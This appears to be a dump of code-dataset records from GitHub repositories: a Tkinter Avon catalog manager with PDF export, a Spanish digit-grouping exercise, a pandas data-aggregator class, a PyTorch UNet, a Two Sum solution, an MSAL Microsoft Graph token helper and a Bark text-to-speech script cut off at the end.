Please add some items.\")\n return\n except FileNotFoundError:\n messagebox.showerror(\"Error\", \"Catalog data file not found.\")\n return\n\n generate_pdf_image = PhotoImage(file='pdfbutton.png')\n generate_pdf_button = Button(frame_screen, text=\"Generate PDF\", image=generate_pdf_image, bg='#F52D2D',\n borderwidth=0,\n command=generate_pdf_from_table)\n generate_pdf_button.image = generate_pdf_image\n generate_pdf_button.place(x=855, y=0, anchor='nw')\n\n # Create search entry, category dropdown, and button\n search_label = ttk.Label(frame_screen, text=\"Search by Name:\")\n search_label.place(x=10, y=10)\n\n search_entry = ttk.Entry(frame_screen, width=20)\n search_entry.place(x=120, y=10)\n\n # Category dropdown using Menubutton\n category_label = Label(frame_screen, text=\"Category:\")\n category_label.place(x=350, y=10)\n\n categories = [\n \"All\",\n \"Makeup\",\n \"Fragrance\",\n \"Skincare\",\n \"Bath and Body\",\n \"Intimate Apparel\",\n \"Accessories\",\n \"Jewelry\",\n \"Men's Store\",\n \"Home & Kitchen\",\n \"Nutrition\",\n \"Other\"\n ]\n\n category_var = StringVar()\n category_var.set(categories[0]) # Set default category\n\n category_menu = Menubutton(frame_screen, textvariable=category_var, indicatoron=True, borderwidth=1,\n relief=\"raised\", width=13)\n category_menu.place(x=420, y=10, height=20)\n\n category_menu.menu = Menu(category_menu, tearoff=False)\n category_menu[\"menu\"] = category_menu.menu\n\n for category in categories:\n category_menu.menu.add_radiobutton(label=category, variable=category_var, value=category)\n\n search_button = ttk.Button(frame_screen, text=\"Search\",\n command=lambda: search_and_display_table(search_entry.get(), category_var.get()))\n search_button.place(x=550, y=7)\n\n # Create Treeview widget\n table = ttk.Treeview(frame_screen, columns=('ID', 'Name', 'Price', 'Description', 'Category'), show='headings')\n table.place(x=0, y=40, width=890, height=430)\n\n # Set column headings\n table.heading('ID', text='ID')\n table.heading('Name', text='Name')\n table.heading('Price', text='Price')\n table.heading('Description', text='Description')\n table.heading('Category', text='Category')\n\n # Set column widths\n column_widths = {'ID': 50, 'Name': 150, 'Price': 100, 'Description': 100, 'Category': 100}\n for column, width in column_widths.items():\n table.column(column, width=width)\n\n # Set font size for the entire table\n font_size = 12 # Adjust the font size as needed\n font_style = font.Font(size=font_size)\n table.tag_configure('myfont', font=font_style)\n\n # Add a vertical scrollbar\n scrollbar = ttk.Scrollbar(frame_screen, orient='vertical', command=table.yview)\n scrollbar.place(x=870, y=50, height=410)\n table.configure(yscrollcommand=scrollbar.set)\n\n # Event handler for resetting column widths\n def reset_column_widths(event):\n for column, width in column_widths.items():\n table.column(column, width=width)\n\n # Bind the callback function to the cell click event\n def on_cell_click(event):\n if not table.selection():\n # No item is selected, do nothing\n return\n\n item = table.selection()[0]\n item_data = table.item(item, 'values')\n full_description = item_data[3] if item_data else \"\" # Assuming description is at index 3\n\n # Deselect the currently selected item\n table.selection_remove(item)\n\n # Display full description in a pop-up window\n simpledialog.messagebox.showinfo(\"Full Description\", full_description)\n\n table.bind('', on_cell_click)\n\n # Bind the event handler to the column header\n for column in 
column_widths.keys():\n table.heading(column, text=column, command=lambda c=column: reset_column_widths(c))\n table.heading(column, anchor=\"w\")\n\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n for line in file:\n data = line.strip().split(\"|\")\n table.insert('', index=0, values=(data[0], data[1], data[2], data[3], data[4]), tags='myfont')\n except FileNotFoundError:\n messagebox.showerror(\"Error\", \"Catalog data file not found.\")\n\n # Store the table globally\n table = table\n # Other widgets (close button)\n close_button = ttk.Button(frame_screen, text=\"Close\", command=reset_frame)\n close_button.place(x=100, y=480, height=30)\n\n\ndef search_and_display_table(search_term, selected_category):\n global table # Access the global table variable\n table.delete(*table.get_children()) # Clear the existing table in the table\n\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n for line in file:\n data = line.strip().split(\"|\")\n if (selected_category == \"All\" or data[4] == selected_category) and search_term.lower() in data[1].lower():\n table.insert('', index=0, values=(data[0], data[1], data[2], data[3], data[4]), tags='myfont')\n except FileNotFoundError:\n messagebox.showerror(\"Error\", \"Catalog data file not found.\")\n\n\nclass PDFWithFooter(FPDF):\n def footer(self):\n self.set_y(-15)\n self.set_font(\"Arial\", size=10)\n self.cell(0, 10, f\"Page {self.page_no()}\", 0, 0, 'C')\n\n\ndef truncate_text(text, max_length):\n return (text[:max_length] + '...') if len(text) > max_length else text\n\n\ndef generate_pdf_from_table():\n global table # Access the global table variable\n\n # Check if the table is empty\n if not table.get_children():\n messagebox.showerror(\"Error\", \"Table is empty. Please add items before generating a PDF.\")\n return\n\n # Prompt the user for a PDF file name\n pdf_file_name = simpledialog.askstring(\"PDF File Name\", \"Enter a name for the PDF file:\")\n\n # Check if the user provided a name\n if pdf_file_name is None or pdf_file_name.strip() == \"\":\n messagebox.showerror(\"Error\", \"Invalid PDF file name. Please provide a valid name.\")\n return\n\n # Construct the PDF file path\n pdf_file_path = f\"{pdf_file_name.strip()}.pdf\"\n\n # Check if the file already exists\n if os.path.exists(pdf_file_path):\n # Ask the user if they want to overwrite the existing file\n response = messagebox.askyesno(\"File Exists\",\n f\"A file named '{pdf_file_name}' already exists. 
Do you want to overwrite it?\")\n\n if not response:\n return # User chose not to overwrite, do nothing\n\n # Get the table data\n data = []\n for item_id in table.get_children():\n item_data = table.item(item_id)['values']\n truncated_data = [truncate_text(str(col), 30) for col in item_data] # Adjust max_length as needed\n data.append(truncated_data)\n\n # Create a PDF document with footer\n pdf = PDFWithFooter()\n\n # Add the first page\n pdf.add_page()\n\n # Add Avon logo to the top of the PDF\n avon_logo = \"avon_logo.png\" # Adjust the path accordingly\n pdf.image(avon_logo, x=10, y=8, w=30)\n\n # Set font for the title\n pdf.set_font(\"Arial\", 'B', 16)\n pdf.ln(10) # Move down to leave space between logo and title\n pdf.cell(0, 10, 'Avon Catalog', ln=True, align='C')\n\n # Move down to leave space for the table\n pdf.ln(20)\n\n # Set font for the table content\n pdf.set_font(\"Arial\", size=12)\n pdf.set_font(\"Arial\", size=12)\n\n # Set background color for header row\n pdf.set_fill_color(228, 4, 75)\n\n # Define the column widths\n col_widths = [30, 40, 40, 40, 40]\n\n # Add column headings to PDF\n for i, col in enumerate(table[\"columns\"]):\n pdf.cell(col_widths[i], 10, str(col), border=1, fill=True, ln=False)\n\n pdf.ln()\n\n # Set background colors for data rows\n pdf.set_fill_color(255, 255, 255)\n for row in data:\n for i, col in enumerate(row):\n pdf.cell(col_widths[i], 10, truncate_text(str(col), 15), border=1, fill=True,\n ln=False) # Adjust max_length as needed\n pdf.ln(10) # Leave space between rows\n\n # Check if there's enough space for another row, if not, add a new page\n if pdf.get_y() + 20 > pdf.h - 15:\n pdf.add_page()\n\n try:\n # Attempt to save the PDF file\n pdf.output(pdf_file_path)\n messagebox.showinfo(\"Success\", f\"PDF '{pdf_file_name}' generated successfully.\")\n except PermissionError:\n # Handle the case where the file is in use with a dialog box\n error_message = (\n f\"The file '{pdf_file_path}' is currently open. 
\"\n f\"Please close it before generating a new PDF.\"\n )\n messagebox.showerror(\"Permission Error\", error_message)\n\n\ndef load_from_file():\n global item_list\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n for line in file:\n values = line.strip().split(\"|\")\n if len(values) >= 6: # Ensure there are at least 6 elements in the list\n # Assuming the format is: ID, Name, Price, Description, Category, ImagePath\n item = {\n 'id': values[0],\n 'name': values[1],\n 'price': float(values[2]), # Convert 'price' to float\n 'description': values[3],\n 'category': values[4],\n 'image_path': values[5].strip() # Remove leading/trailing spaces from the file path\n }\n item_list.append(item) # Append the item to user_list\n else:\n print(f\"Skipping invalid line: {line}\")\n\n # Update the user interface with the loaded catalog data\n\n except FileNotFoundError:\n pass\n\n\ndef create_item_boxes():\n global canvas, canvas_frame # Declare canvas and canvas_frame as global\n\n # Clear existing item boxes\n for widget in canvas_frame.winfo_children():\n widget.destroy()\n\n # Create a dictionary to store items by category\n items_by_category = {}\n\n for item in item_list:\n category = item['category']\n if category not in items_by_category:\n items_by_category[category] = []\n items_by_category[category].append(item)\n\n # Create a frame with a custom border color\n box_frame = tk.Frame(canvas_frame, relief=\"solid\", highlightbackground=\"#E4044B\")\n box_frame.grid(row=0, column=0, padx=5, pady=5)\n\n # Iterate through each category and display items\n for category, items in items_by_category.items():\n # Add category title row\n title_row = tk.Frame(box_frame, bd=0, relief=\"flat\", bg=\"#E4044B\")\n title_row.pack(side=tk.TOP, fill=tk.X, padx=5, pady=5)\n category_title = ttk.Label(title_row, text=category, font=(\"Arial\", 14, \"bold\"), foreground=\"white\",\n background=\"#E4044B\")\n category_title.pack(side=tk.LEFT, padx=5, pady=5)\n\n # Add items in a 3 by 3 grid\n items_frame = tk.Frame(box_frame, bd=0, relief=\"flat\", bg=\"white\")\n items_frame.pack(side=tk.TOP, fill=tk.BOTH, padx=5, pady=5)\n\n for i, item in enumerate(items):\n img = Image.open(item['image_path'])\n img.thumbnail((254, 254), Image.BICUBIC) # Resize to 254 by 254 pixels\n photo = ImageTk.PhotoImage(img)\n\n # Change the border color here\n item_frame = tk.Frame(items_frame, bd=1, relief=\"solid\", highlightbackground=\"#e7004c\")\n item_frame.grid(row=i // 3, column=i % 3, padx=5, pady=5)\n\n item_box = tk.Label(item_frame, text=item['name'], image=photo, compound=tk.TOP)\n item_box.photo = photo\n font_size = 14\n item_box['font'] = font.Font(size=font_size)\n item_box.pack()\n\n # Bind the click event to show_item_info function\n item_box.bind(\"\", lambda event, u=item: show_item_info(u))\n\n # Configure grid weights for resizing\n box_frame.grid_columnconfigure(0, weight=1)\n box_frame.grid_rowconfigure(1, weight=1)\n\n # Update the scroll region to include the new item boxes\n canvas.configure(scrollregion=canvas.bbox(\"all\"))\n\n # Bind mouse wheel event for vertical scrolling\n canvas.bind(\"\", lambda event: canvas.yview_scroll(int(-1 * (event.delta / 120)), \"units\"))\n\n # Bind the event to update the scroll region when the canvas_frame size changes\n canvas_frame.bind(\"\", lambda event: canvas.configure(scrollregion=canvas.bbox(\"all\")))\n\n\ndef display_items():\n global canvas, item_list, canvas_frame\n\n # Reset the canvas and frame\n reset_frame()\n\n # Create a Canvas widget with a 
vertical scrollbar\n canvas = tk.Canvas(frame_screen, width=884, height=539, bd=2)\n canvas.place(x=0, y=0)\n canvas.grid(row=2, column=0, columnspan=4, sticky='nsew')\n\n # Scroll Bar\n scrollbar = tk.Scrollbar(frame_screen, command=canvas.yview)\n scrollbar.grid(row=2, column=4, sticky='ns')\n canvas.configure(yscrollcommand=scrollbar.set)\n\n # Canvas\n canvas_frame = tk.Frame(canvas)\n canvas.create_window((0, 0), window=canvas_frame, anchor=tk.NW)\n\n # List to store item data\n item_list = []\n\n # Load existing item data from file\n load_from_file()\n\n # Sort items\n item_list.sort(key=lambda x: x['name'].lower())\n\n # Display existing item data\n create_item_boxes()\n if not item_list:\n # Return a message if there are no items in the catalog\n messagebox.showinfo(\"No Items\", \"Catalog file is empty. Please add some items.\")\n return\n # Configure grid weights for resizing\n for i in range(4):\n root.grid_columnconfigure(i, weight=1)\n root.grid_rowconfigure(2, weight=1)\n canvas.configure(scrollregion=(0, 0, 500, 500)) # Adjust these values as needed\n\n # Bind the event to update the scroll region when the canvas_frame size changes\n canvas_frame.bind(\"\", lambda event: canvas.configure(scrollregion=canvas.bbox(\"all\")))\n\n # Other widgets (close button)\n close_image = PhotoImage(file=\"close_button.png\")\n close_button = ttk.Button(frame_screen, text=\"Close\", image=close_image, command=reset_frame)\n close_button.image = close_image # Ensure the image is not garbage collected\n close_button.place(x=845, y=0, height=50, width=50)\n\n\ndef close_current_info_window():\n global current_info_window\n if current_info_window:\n current_info_window.destroy()\n current_info_window = None\n\ndef show_item_info(item):\n global current_info_window\n\n close_current_info_window() # Close the previous window if it exists\n\n info_window = tk.Toplevel(root)\n info_window.title(\"Item Information\")\n info_window.resizable(False, False)\n\n # Load the image and create a resized thumbnail\n img = Image.open(item['image_path'])\n img.thumbnail((254, 254), Image.BICUBIC)\n photo = ImageTk.PhotoImage(img)\n\n # Create a label with the item's name and thumbnail image\n item_frame = tk.Frame(info_window)\n item_frame.pack(padx=10, pady=10)\n\n item_box = ttk.Label(item_frame, text=item['name'], image=photo, compound=tk.TOP, font=(\"Arial\", 14))\n item_box.photo = photo\n item_box.pack()\n\n # Create a frame for the price display\n price_frame = tk.Frame(info_window, bg=\"#e7004c\", padx=10, pady=5, relief=\"solid\", borderwidth=1, bd=1)\n price_frame.pack(pady=5)\n\n # Display the rounded price\n price_label = ttk.Label(price_frame, text=f\"Price: ₱{item['price']:.2f}\", font=(\"Arial\", 12),\n foreground=\"white\", background=\"#e7004c\")\n price_label.pack()\n\n # Create a scrolled text widget for the description\n description_frame = tk.Frame(info_window, padx=10, pady=5)\n description_frame.pack()\n\n description_text = tk.Text(description_frame, wrap=\"word\", height=5, width=40)\n description_text.insert(tk.END, item['description'])\n description_text.config(state=tk.DISABLED)\n description_text.pack(side=tk.LEFT, fill=tk.Y)\n\n # Create a vertical scrollbar for the description\n description_scrollbar = ttk.Scrollbar(description_frame, orient=\"vertical\", command=description_text.yview)\n description_scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n description_text[\"yscrollcommand\"] = description_scrollbar.set\n\n # Display additional information using a Text widget\n 
additional_info_text = tk.Text(info_window, wrap=\"word\", height=2, width=40)\n additional_info_text.insert(tk.END, f\"Category: {item['category']}\\nID: {item['id']}\")\n additional_info_text.config(state=tk.DISABLED)\n additional_info_text.pack(pady=10)\n\n # Center the window on the screen\n info_window.update_idletasks()\n width = info_window.winfo_width()\n height = info_window.winfo_height()\n x = (info_window.winfo_screenwidth() - width) // 2\n y = (info_window.winfo_screenheight() - height) // 2\n info_window.geometry(f\"{width}x{height}+{x}+{y}\")\n\n # Update the current information window\n current_info_window = info_window\nroot = Tk()\nroot.geometry('1280x720')\nroot.resizable(False, False)\nroot.title('Avon Catalog Management System')\n# Logo\nlogo_image = PhotoImage(file='avon_logo.png')\nroot.iconphoto(True, logo_image)\n\n#Main Ui Interface\nframePhoto = PhotoImage(file='Frame 1.png')\nframe_photo_label = Label(root, border=0, image=framePhoto)\nframe_photo_label.pack(fill=BOTH, expand=True)\n\n#Slogan Image\nslogan_frame = PhotoImage(file='slogan.png')\nslogan_frame_label = Label(root, image=slogan_frame, border=0, bg='#E4044B')\nslogan_frame_label.place(x=0, y=140)\n\n# Frame\nframe_screen = Frame(root, width=920, height=536, borderwidth=10, relief=\"flat\")\nframe_screen.place(x=360, y=184)\n\nadd_item_image = PhotoImage(file='add_button.png')\nadd_button = Button(root, text=\"Add Item\", image=add_item_image, bg='#FFFFFF', borderwidth=0,\n command=add_item)\nadd_button.image = add_item_image\nadd_button.place(x=19, y=194, anchor='nw')\n\ndisplay_table_image = PhotoImage(file='display_table_button.png')\ndisplay_table_button = Button(root, text=\"Display table\", image=display_table_image, bg='#FFFFFF', borderwidth=0,\n command=display_table)\ndisplay_table_button.image = display_table_image\ndisplay_table_button.place(x=19, y=295, anchor='nw')\n\ndisplay_items_image = PhotoImage(file='display_items_button.png')\ndisplay_button = Button(root, text=\"Delete Item\", image=display_items_image, bg='#FFFFFF', borderwidth=0,\n command=display_items)\ndisplay_button.image = display_items_image\ndisplay_button.place(x=19, y=396, anchor='nw')\n\ndelete_item_image = PhotoImage(file='delete_button.png')\ndelete_button = Button(root, text=\"Delete Item\", image=delete_item_image, bg='#FFFFFF', borderwidth=0,\n command=delete)\ndelete_button.image = delete_item_image\ndelete_button.place(x=19, y=497, anchor='nw')\n\nupdate_item_image = PhotoImage(file='update_button.png')\nupdate_button = Button(root, text=\"Update Item\", image=update_item_image, bg='#FFFFFF', borderwidth=0,\n command=update_item)\nupdate_button.image = update_item_image\nupdate_button.place(x=19, y=598, anchor='nw')\nroot.mainloop()\n","repo_name":"alettuce17/Group5System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":40534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21693448792","text":"print('ejercicio 3')\n\n#números de 5 dígitos, en un vector, hasta que uno de ellos sea negativo.\nnum = str(input('ingresar numero de cinco digitos: '))\n\ndef validar_digitos(numero):\n esvalido = True\n if (len(numero) > 5) or ('-' in num):\n esvalido = False\n return esvalido\n\nprint(num)\nprint(validar_digitos(num))\n\n#descomponer los números\n\n\n# agrupando los dígitos pares en un vector y los impares\nlista_par = []\nlista_impar = []\n\ndef agrupar(numeros):\n for i in numeros:\n numerito = int(i)\n if (numerito % 2 == 
0):\n lista_par.append(numerito)\n else:\n lista_impar.append(numerito)\n\nagrupar(num)\nprint('los numeros pares ingresados son: ')\nprint(lista_par)\nprint('los numeros impares ingresados son: ')\nprint(lista_impar)\n\n#se deben mostrar los resultados de las sumas de los números de estos últimos \n# vectores por posiciones contiguas (el 1ro de los pares con el 1ro de los impares, y así sucesivamente).\n\nlista_resultado = []\n\nif (len(lista_par) > len(lista_impar)):\n dif = len(lista_par) - len(lista_impar)\n for i in range(dif):\n lista_impar.append(0)\n\n\n for x in range(len(lista_par)):\n suma = lista_par[x] + lista_impar[x]\n lista_resultado.append(suma)\nelse: \n dif = len(lista_impar) - len(lista_par)\n for i in range(dif):\n lista_par.append(0)\n\n\n for x in range(len(lista_impar)):\n suma = lista_impar[x] + lista_par[x]\n lista_resultado.append(suma)\n\nprint('el resultado de la suma de los pares con impares es: ')\nprint(lista_resultado) \n\n","repo_name":"Maxi-rpc/python_practice","sub_path":"Guada/23-05-13 guia n3/ej3.py","file_name":"ej3.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28124251730","text":"import pandas as pd\nimport numpy as np\nimport re\nimport sys\nimport datetime\nfrom uploading_command import UploadingCommand\nsys.path.append(\"../temhelp\")\nfrom true_tem_handler import TrueTemplateHandler\n\nclass DataAggregator(UploadingCommand):\n\n def __init__(self, template_name):\n '''\n (DataAggregator, str) -> None\n\n Initializes a data aggregator, and injects a specific template\n name into the uploading command\n '''\n UploadingCommand.__init__(self, template_name)\n self._postal_code = 'Postal Code'\n self._processing_detail = 'Processing Detail'\n \n\n def execute(self, df, th):\n '''\n (DataAggregator, DataFrame, TemplateHandler) -> DataFrame\n\n Executes the command, assuming a dataframe object gets passed in.\n Currently only checks whether the data matches the type the column is\n supposed to be.\n '''\n template = th\n self._exec_status = False\n copy_df = df\n # get a list of fields that are not formatted correctly\n wrong_format_fields = parse_all_columns(df, template)\n # Check for postal code column\n if (df.get(self._postal_code) is not None):\n new_postal = self._postal_code_checker(df[self._postal_code])\n # DataFrame.update works in place and returns None, so do not reassign\n copy_df.update(new_postal)\n # Change Processing detail column to the entry date\n if (df.get(self._processing_detail) is not None):\n new_proc = self._processing_details(df[self._processing_detail])\n df.update(new_proc)\n \n self._exec_status = True \n return df\n \n def _processing_details(self, df):\n '''\n (DataFrame) -> DataFrame\n \n Takes in the 'Processing Detail' column and replaces each element\n with the current date.\n '''\n new_col = list()\n now = datetime.datetime.now()\n # Format: YYYY/MM/DD\n now = str(now.year) +'/' + str(now.month) + '/' + str(now.day)\n for item in range(len(df.get_values())):\n new_col.append(now)\n \n return pd.DataFrame(new_col, columns=[self._processing_detail]) \n \n def _postal_code_checker(self, df):\n '''\n (DataFrame) -> DataFrame\n The DataFrame of 'Postal_Code' is given, then return a new\n 'Postal_Code' DataFrame to fix any mismatched Canadian\n postal codes. The only accepted form is 'X1X1X1'. 
If there is\n data that is not the correct format, it will be replaced by an\n empty string.\n '''\n p_codes = list()\n # Initialize the regex: three letter-digit pairs (the letter is required)\n p = re.compile('^([A-Za-z][0-9]){3}$')\n for value in df.get_values():\n # Get the value (string)\n postal_code = value\n postal_code = postal_code.replace('-', '')\n postal_code = postal_code.replace(' ', '')\n # Check if the given data matches the type\n if (len(postal_code) == 6 and p.match(postal_code)):\n p_codes.append(postal_code)\n else:\n # An empty string replaces the false data\n p_codes.append('')\n \n return pd.DataFrame(p_codes, columns=[self._postal_code]) \n \n def executed_properly(self):\n '''\n (Command) -> boolean\n\n Returns a boolean to determine if this command was executed properly\n '''\n return self._exec_status\n\ndef parse_all_columns(df, template):\n '''\n (DataFrame, TemplateHandler) -> List of\n [Tuple of (String, int)]\n \n Given a DataFrame and TemplateHandler, returns a list of\n (column name, row index) pairs for the fields that do not match\n the regex/format.\n '''\n # List to store the tuples\n misformated = list()\n # Gets the column names to a list\n header_name = template.get_headers()\n \n for col_i in range(len(header_name)):\n column = df.get(header_name[col_i])\n if (column is not None):\n # Gets the Regex (has regex, regex value, example)\n regex = template.handle_template(header_name[col_i])\n if (regex[1] != \"\"):\n # Record only the fields that fail the template regex\n for row in range(len(df.index)):\n if not re.match(regex[1], str(column.iloc[row])):\n misformated.append((header_name[col_i], row))\n \n return misformated\n","repo_name":"susanwang98/TEQ-App","sub_path":"src/commands/data_aggregator.py","file_name":"data_aggregator.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28881346759","text":"\"\"\" Full assembly of the parts to form the complete network \"\"\"\n\nfrom .unet_parts import *\n\n\nclass UNet(nn.Module):\n def __init__(self, n_channels, bilinear=False):\n super(UNet, self).__init__()\n self.n_channels = n_channels\n self.bilinear = bilinear\n\n self.inc = DoubleConv(n_channels, 64)\n self.down1 = Down(64, 128)\n self.down2 = Down(128, 256)\n self.down3 = Down(256, 512)\n factor = 2 if bilinear else 1\n self.down4 = Down(512, 1024 // factor)\n\n self.bc_up1 = Up(1024, 512 // factor, bilinear)\n self.bc_up2 = Up(512, 256 // factor, bilinear)\n self.bc_up3 = Up(256, 128 // factor, bilinear)\n self.bc_up4 = Up(128, 64, bilinear)\n self.bc_outc = OutConv(64, 3)\n\n self.r_up1 = Up(1024, 512 // factor, bilinear)\n self.r_up2 = Up(512, 256 // factor, bilinear)\n self.r_up3 = Up(256, 128 // factor, bilinear)\n self.r_up4 = Up(128, 64, bilinear)\n self.r_outc = OutConv(64, 1)\n\n self.m_up1 = Up(1024, 512 // factor, bilinear)\n self.m_up2 = Up(512, 256 // factor, bilinear)\n self.m_up3 = Up(256, 128 // factor, bilinear)\n self.m_up4 = Up(128, 64, bilinear)\n self.m_outc = OutConv(64, 1)\n\n self.n_up1 = Up(1024, 512 // factor, bilinear)\n self.n_up2 = Up(512, 256 // factor, bilinear)\n self.n_up3 = Up(256, 128 // factor, bilinear)\n self.n_up4 = Up(128, 64, bilinear)\n self.n_outc = OutConv(64, 3)\n\n def forward(self, x):\n x1 = self.inc(x)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n\n bc_x = self.bc_up1(x5, x4)\n bc_x = self.bc_up2(bc_x, x3)\n bc_x = self.bc_up3(bc_x, x2)\n bc_x = self.bc_up4(bc_x, x1)\n bc_logits = self.bc_outc(bc_x)\n\n r_x = self.r_up1(x5, x4)\n r_x = self.r_up2(r_x, x3)\n r_x = self.r_up3(r_x, x2)\n r_x = 
self.r_up4(r_x, x1)\n r_logits = self.r_outc(r_x)\n\n m_x = self.m_up1(x5, x4)\n m_x = self.m_up2(m_x, x3)\n m_x = self.m_up3(m_x, x2)\n m_x = self.m_up4(m_x, x1)\n m_logits = self.m_outc(m_x)\n\n n_x = self.n_up1(x5, x4)\n n_x = self.n_up2(n_x, x3)\n n_x = self.n_up3(n_x, x2)\n n_x = self.n_up4(n_x, x1)\n n_logits = self.n_outc(n_x)\n\n out = torch.cat([bc_logits, r_logits, m_logits, n_logits], dim=1)\n # print(out.size())\n\n\n return out\n","repo_name":"szu-advtech/AdvTech","sub_path":"2022/22-姜柳彤 指导老师-胡瑞珍/unet/unet_model.py","file_name":"unet_model.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"18070449360","text":"# https://leetcode.com/problems/two-sum/\n\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n \n start = 0\n end = len(nums)-1\n \n while start < end:\n \n for i in range(start, end):\n \n if nums[start] + nums[i+1] == target:\n return start, i+1\n \n start += 1\n \n return -1\n","repo_name":"mmilett14/leetcode","sub_path":"algorithms/1_two_sum.py","file_name":"1_two_sum.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17999145360","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis module contains the functions used to get the access token for MS Graph.\n\"\"\"\n\n\nfrom msal import ConfidentialClientApplication, PublicClientApplication\n\nAUTHORITY = \"https://login.microsoftonline.com/\"\nSCOPE = [\"https://graph.microsoft.com/.default\"]\n\n\ndef obtain_accesstoken_app(TENANT_NAME, CLIENT_ID, CLIENT_SECRET):\n \"\"\"\n This function is used to get an access token to MS Graph using client credentials.\n\n :param TENANT_NAME: The name of the Azure tenant\n :param CLIENT_ID: The ID of the registered Azure AD application\n :param CLIENT_SECRET: Secret of the registered Azure AD application\n :return: The access token\n \"\"\"\n\n # Create app instance\n app = ConfidentialClientApplication(\n client_id=CLIENT_ID,\n client_credential=CLIENT_SECRET,\n authority=AUTHORITY + TENANT_NAME,\n )\n\n token = None\n\n try:\n # Check if token is already cached\n token = app.acquire_token_silent(SCOPE, account=None)\n\n # If not, get a new token\n if not token:\n token = app.acquire_token_for_client(scopes=SCOPE)\n if not token:\n raise Exception(\"No token returned\")\n\n except Exception as e:\n raise Exception(\"Error obtaining access token: \" + str(e))\n\n return token\n\n\ndef obtain_accesstoken_cert(TENANT_NAME, CLIENT_ID, THUMBPRINT, KEY_FILE):\n \"\"\"\n This function is used to get an access token to MS Graph using a certificate.\n\n :param TENANT_NAME: The name of the Azure tenant\n :param CLIENT_ID: The ID of the registered Azure AD application\n :param THUMBPRINT Thumbprint of the certificate uploaded to Azure AD\n :param KEY_FILE: Path to the private key of the certificate\n :return: The access token\n \"\"\"\n\n # Create app instance\n app = ConfidentialClientApplication(\n client_id=CLIENT_ID,\n client_credential={\n \"thumbprint\": THUMBPRINT,\n \"private_key\": open(KEY_FILE).read(),\n },\n authority=AUTHORITY + TENANT_NAME,\n )\n\n token = None\n\n try:\n # Check if token is already cached\n token = app.acquire_token_silent(SCOPE, account=None)\n\n # If not, get a new token\n if not token:\n token = app.acquire_token_for_client(scopes=SCOPE)\n if not token:\n raise 
Exception(\"No token returned\")\n\n except Exception as e:\n raise Exception(\"Error obtaining access token: \" + str(e))\n\n return token\n\n\ndef obtain_accesstoken_interactive(TENANT_NAME, CLIENT_ID):\n \"\"\"\n This function is used to get an access token to MS Graph interactivly.\n\n :param TENANT_NAME: The name of the Azure tenant\n :param CLIENT_ID: The ID of the registered Azure AD application\n :return: The access token\n \"\"\"\n\n # Create app instance\n app = PublicClientApplication(\n client_id=CLIENT_ID,\n client_credential=None,\n authority=AUTHORITY + TENANT_NAME,\n )\n\n token = None\n\n # Set the requited scopes\n scopes = [\n \"DeviceManagementApps.ReadWrite.All\",\n \"DeviceManagementConfiguration.ReadWrite.All\",\n \"DeviceManagementManagedDevices.Read.All\",\n \"DeviceManagementServiceConfig.ReadWrite.All\",\n \"Group.Read.All\",\n \"Policy.ReadWrite.ConditionalAccess\",\n \"Policy.Read.All\",\n ]\n\n try:\n # Get the token interactively\n token = app.acquire_token_interactive(\n scopes=scopes, max_age=1200, prompt=\"select_account\"\n )\n\n if not token:\n raise Exception(\"No token returned\")\n\n except Exception as e:\n raise Exception(\"Error obtaining access token: \" + str(e))\n\n return token\n","repo_name":"almenscorner/IntuneCD","sub_path":"src/IntuneCD/get_accesstoken.py","file_name":"get_accesstoken.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"19"} +{"seq_id":"9869871212","text":"#Authors\n#Sean Brill \n#James Campbell\n#source: https://github.com/suno-ai/bark\n\nfrom transformers import AutoProcessor, BarkModel\nimport scipy \n\n#must use cpu if you do not have a CUDA enabled NVIDIA GPU\n#must also set up CUDA\noutput_dir = './audio_outputs'\nproccessor = None\nmodel = None\ndevice = 'cpu' #default to cpu\n\ndef useGPU():\n global device\n device = 'cuda:0'\n\ndef useCPU():\n global device\n device = 'cpu'\n\n\n#possible devices\n#cpu\n#cuda:0\n#cuda:1\n#cuda:n where n is the gpu index\n\n\ndef generate_audio(text, preset, file_name):\n inputs = proccessor(text, voice_preset=preset)\n for k, v in inputs.items():\n inputs[k] = v.to(device)\n audio_array = model.generate(**inputs)\n audio_array = audio_array.cpu().numpy().squeeze()\n sample_rate = model.generation_config.sample_rate\n scipy.io.wavfile.write(output_dir + '/' + file_name, rate=sample_rate, data=audio_array)\n\ndef initialize():\n global proccessor\n global model\n proccessor = AutoProcessor.from_pretrained(\"suno/bark\")\n model = BarkModel.from_pretrained(\"suno/bark\")\n model.to(device)\n\n\nuseGPU()\ninitialize()\n\ngenerate_audio(\n text=\"Hello, what you are hearing is completly AI generated audio.. pretty cool huh!? 
